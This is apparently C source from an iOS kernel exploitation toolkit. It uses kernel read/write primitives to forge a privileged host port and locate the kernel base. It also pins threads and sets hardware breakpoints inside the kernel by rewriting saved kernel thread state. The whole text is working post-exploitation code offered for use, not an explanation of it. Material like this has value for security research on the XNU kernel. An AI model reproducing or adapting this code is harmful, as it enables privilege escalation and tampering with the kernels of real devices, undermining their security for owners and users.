// build a fake host priv port mach_port_t fake_host_priv() { if (fake_host_priv_port != MACH_PORT_NULL) { return fake_host_priv_port; } // get the address of realhost: uint64_t hostport_addr = find_port(mach_host_self()); uint64_t realhost = rk64(hostport_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); // allocate a port mach_port_t port = MACH_PORT_NULL; kern_return_t err; err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); if (err != KERN_SUCCESS) { printf("failed to allocate port\n"); return MACH_PORT_NULL; } // get a send right mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); // locate the port uint64_t port_addr = find_port(port); // change the type of the port #define IKOT_HOST_PRIV 4 #define IO_ACTIVE 0x80000000 wk32(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_ACTIVE|IKOT_HOST_PRIV); // change the space of the port wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), ipc_space_kernel()); // set the kobject wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), realhost); fake_host_priv_port = port; return port; }
uint64_t find_kernel_base() { uint64_t hostport_addr = find_port(mach_host_self()); uint64_t realhost = rk64(hostport_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); uint64_t base = realhost & ~0xfffULL; // walk down to find the magic: for (int i = 0; i < 0x10000; i++) { if (rk32(base) == 0xfeedfacf) { return base; } base -= 0x1000; } return 0; }
// this runs on the thread which will execute the target syscall to debug void run_syscall_with_breakpoint(uint64_t bp_address, breakpoint_callback callback, uint32_t syscall_number, uint32_t n_args, ...) { // pin this thread to the target cpu: pin_current_thread(); // set the Kernel Debug Enable bit of MDSCR_EL1: set_MDSCR_EL1_KDE(mach_thread_self()); // MDE will be set by the regular API for us // enable a hw debug breakpoint at bp_address // it won't fire because PSTATE.D will be set, but we'll deal with that in a bit! // set a hardware bp on the thread using the proper API so that all the structures are already set up: struct arm64_debug_state state = {0}; state.bvr[0] = bp_address; #define BCR_BAS_ALL (0xf << 5) #define BCR_E (1 << 0) state.bcr[0] = BCR_BAS_ALL | BCR_E; // enabled kern_return_t err = thread_set_state(mach_thread_self(), ARM_DEBUG_STATE64, (thread_state_t)&state, sizeof(state)/4); // verify that it got set: memset(&state, 0, sizeof(state)); mach_msg_type_number_t count = sizeof(state)/4; err = thread_get_state(mach_thread_self(), ARM_DEBUG_STATE64, (thread_state_t)&state, &count); if (state.bvr[0] != bp_address) { printf("setting the bp address failed\n"); } // now go and find that thread's DebugData where those values are stored. uint64_t thread_port_addr = find_port_address(mach_thread_self(), MACH_MSG_TYPE_COPY_SEND); uint64_t thread_t_addr = rk64(thread_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); printf("thread_t_addr: %llx\n", thread_t_addr); // read bvr[0] in that thread_t's DebugData: uint64_t DebugData = rk64(thread_t_addr + ACT_DEBUGDATA_OFFSET); //printf("DebugData: %llx\n", DebugData); uint64_t bvr0 = rk64(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bvr[0])); printf("bvr0 read from the DebugData: 0x%llx\n", bvr0); uint32_t bcr0 = rk32(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bcr[0])); printf("bcr0 read from the DebugData: 0x%08x\n", bcr0); // need to manually set this too in the bcr: #define ARM_DBG_CR_MODE_CONTROL_ANY (3 << 1) bcr0 |= ARM_DBG_CR_MODE_CONTROL_ANY; wk32(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bcr[0]), bcr0); printf("set ARM_DBG_CR_MODE_CONTROL_ANY\n"); // returning from the syscall should be enough to set it. struct monitor_args* margs = malloc(sizeof(struct monitor_args)); margs->target_thread_port = mach_thread_self(); margs->breakpoint = bp_address; margs->callback = callback; // spin up a thread to monitor when the bp is hit: pthread_t th; pthread_create(&th, NULL, monitor_thread, (void*)margs); printf("started monitor thread\n"); struct syscall_args sargs = {0}; sargs.number = syscall_number; va_list ap; va_start(ap, n_args); for (int i = 0; i < n_args; i++){ sargs.arg[i] = va_arg(ap, uint64_t); } va_end(ap); // now execute a syscall with PSTATE.D disabled: syscall_complete = 0; do_syscall_with_pstate_d_unmasked(&sargs); syscall_complete = 1; printf("syscall returned\n"); pthread_join(th, NULL); printf("monitor exited\n"); }
void handle_kernel_bp_hits(mach_port_t target_thread_port, uint64_t looper_pc, uint64_t breakpoint, breakpoint_callback callback) { // get the target thread's thread_t uint64_t thread_port_addr = find_port_address(target_thread_port, MACH_MSG_TYPE_COPY_SEND); uint64_t thread_t_addr = rk64(thread_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); while (1) { uint64_t looper_saved_state = 0; int found_it = 0; while (!found_it) { if (syscall_complete) { return; } // we've pinned ourself to the same core, so if we're running, it isn't... // in some ways this code is very racy, but when we actually have detected that the target // thread has hit the breakpoint it should be safe until we restart it // and up until then we don't do anything too dangerous... // get the kstack pointer uint64_t kstackptr = rk64(thread_t_addr + koffset(KSTRUCT_OFFSET_THREAD_KSTACKPTR)); printf("kstackptr: %llx\n", kstackptr); // get the thread_kernel_state // the stack lives below kstackptr, and kstackptr itself points to a struct thread_kernel_state: // the first bit of that is just an arm_context_t: // this is the scheduled-off state arm_context_t saved_ksched_state = {0}; kmemcpy((uint64_t)&saved_ksched_state, kstackptr, sizeof(arm_context_t)); // get the saved stack pointer uint64_t sp = saved_ksched_state.ss.ss_64.sp; printf("sp: %llx\n", sp); if (sp == 0) { continue; } uint64_t stack[128] = {0}; // walk up from there and look for the saved state dumped by the fiq: // note that it won't be right at the bottom of the stack // instead there are the frames for: // ast_taken_kernel <-- above this is the saved state which will get restored when the hw bp spinner gets rescheduled // thread_block_reason // thread_invoke // machine_switch_context // Switch_context <-- the frame actually at the bottom of the stack // should probably walk those stack frame properly, but this will do... // grab the stack kmemcpy((uint64_t)&stack[0], sp, sizeof(stack)); //for (int i = 0; i < 128; i++) { // printf("%016llx\n", stack[i]); //} for (int i = 0; i < 128; i++) { uint64_t flavor_and_count = stack[i]; if (flavor_and_count != (ARM_SAVED_STATE64 | (((uint64_t)ARM_SAVED_STATE64_COUNT) << 32))) { continue; } arm_context_t* saved_state = (arm_context_t*)&stack[i]; if (saved_state->ss.ss_64.pc != looper_pc) { continue; } found_it = 1; looper_saved_state = sp + (i*sizeof(uint64_t)); printf("found the saved state probably at %llx\n", looper_saved_state); // should walk the stack properly.. break; } if (!found_it) { printf("unable to find the saved scheduler tick state on the stack, waiting a bit then trying again...\n"); sleep(1); return; } } // now keep walking up and find the saved state for the code which hit the BP: uint64_t bp_hitting_state = looper_saved_state + sizeof(arm_context_t); found_it = 0; for (int i = 0; i < 1000; i++) { uint64_t flavor_and_count = rk64(bp_hitting_state); if (flavor_and_count != (ARM_SAVED_STATE64 | (((uint64_t)ARM_SAVED_STATE64_COUNT) << 32))) { bp_hitting_state += 8; continue; } arm_context_t bp_context; kmemcpy((uint64_t)&bp_context, bp_hitting_state, sizeof(arm_context_t)); for (int i = 0; i < 40; i++) { uint64_t* buf = (uint64_t*)&bp_context; printf("%016llx\n", buf[i]); } if (bp_context.ss.ss_64.pc != breakpoint) { printf("hummm, found an unexpected breakpoint: %llx\n", bp_context.ss.ss_64.pc); } found_it = 1; break; } if (!found_it) { printf("unable to find bp hitting state\n"); } // fix up the bp hitting state so it will continue (with whatever modifications we want:) // get a copy of the state: arm_context_t bp_context; kmemcpy((uint64_t)&bp_context, bp_hitting_state, sizeof(arm_context_t)); callback(&bp_context); // write that new state back: kmemcpy(bp_hitting_state, (uint64_t)&bp_context, sizeof(arm_context_t)); // unblock the looper: wk64(looper_saved_state + offsetof(arm_context_t, ss.ss_64.pc), ksym(KSYMBOL_SLEH_SYNC_EPILOG)); // when it runs again it should break out of the loop and continue the syscall // forces us off the core and hopefully it on: thread_switch(target_thread_port, 0, 0); swtch_pri(0); } }
// pin the current thread to a processor, returns a pointer to the processor we're pinned to uint64_t pin_current_thread() { // get the current thread_t: uint64_t th = current_thread(); #if 0 // get the processor_t this thread last ran on uint64_t processor = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_LAST_PROCESSOR)); printf("thread %llx last ran on %llx, pinning it to that core\n", th, processor); // this is probably fine... wk64(th + koffset(KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR), processor); #endif // need the struct cpu_data for that processor which is stored in the CpuDataEntries array, declared in data.s // it's 6*4k in to the data segment uint64_t cpu_data_entries = ksym(KSYMBOL_CPU_DATA_ENTRIES); int cpu_id = 0; // it's an array of cpu_data_entry_t which contains just the 64-bit physical and virtual addresses of struct cpu_data uint64_t cpu_data = rk64(cpu_data_entries + ((cpu_id * 0x10) + 8)); uint64_t processor = rk64(cpu_data + koffset(KSTRUCT_OFFSET_CPU_DATA_CPU_PROCESSOR)); printf("trying to pin to cpu0: %llx\n", processor); // pin to that cpu // this is probably fine... wk64(th + koffset(KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR), processor); // that binding will only take account once we get scheduled off and back on again so yield the cpu: printf("pin_current_thread yielding cpu\n"); swtch_pri(0); printf("pin_current_thread back on cpu\n"); uint64_t chosen = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); printf("running on %llx\n", chosen); #if 0 // should now be running on the chosen processor, and should only get scheduled on there: printf("we're running again!\n"); int got_switched = 0; for (int i = 0; i < 1000; i++) { swtch_pri(0); uint64_t p = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); if (p != processor) { printf("got moved off target processor\n"); got_switched = 1; break; } usleep(15000); p = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); if (p != processor) { printf("got moved off target processor\n"); got_switched = 1; break; } } if (!got_switched) { printf("looks like pinning works!\n"); } #endif return processor; }
uint64_t current_thread() { uint64_t thread_port = find_port(mach_thread_self()); return rk64(thread_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); }
uint64_t ipc_space_kernel() { return rk64(task_self_addr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)); }